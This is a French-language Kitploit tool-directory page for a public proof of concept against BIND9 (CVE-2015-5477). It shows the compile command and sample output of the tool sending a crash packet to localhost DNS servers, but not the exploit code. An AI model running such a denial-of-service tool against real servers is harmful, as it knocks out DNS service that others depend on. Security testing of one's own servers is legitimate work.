Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2015-5477 — Exploit PoC pour l'échec d'assertion TKEY de BIND9 (CVE-2015-5477) | Kitploit
Outils/GitHubGitHub/robertdavidgraham/cve-2015-5477
Analyse des VulnérabilitésExploitationTests d'IntrusionAnalyse DNS
GitHubrobertdavidgraham/cve-2015-5477

cve-2015-5477

Exploit PoC pour l'échec d'assertion TKEY de BIND9 (CVE-2015-5477)

Voir le dépôt
6442il y a 11 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC pour BOND9 TKEY assert DoS (CVE-2015-5477)

Cet exploit teste si un serveur BIND9 est vulnérable en envoyant l'exploit afin de voir s'il plante.

C'est du code C que vous compilez de la manière habituelle sur Unix/Window, par exemple :

root@kitploit:~
# gcc tkill.c -o tkill

Il s'exécutera sur IPv4 et IPv6.

Voici ce que cela donne lors d'une exécution contre localhost. Comme il obtient deux adresses IP en résolvant le nom, il essaiera les deux. Il interroge d'abord la chaîne "version", puis envoie l'exploit. Lorsqu'il sonde la deuxième adresse, la requête de version échoue car le service a déjà planté lors de la première tentative.

root@kitploit:~
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
Télécharger l’outil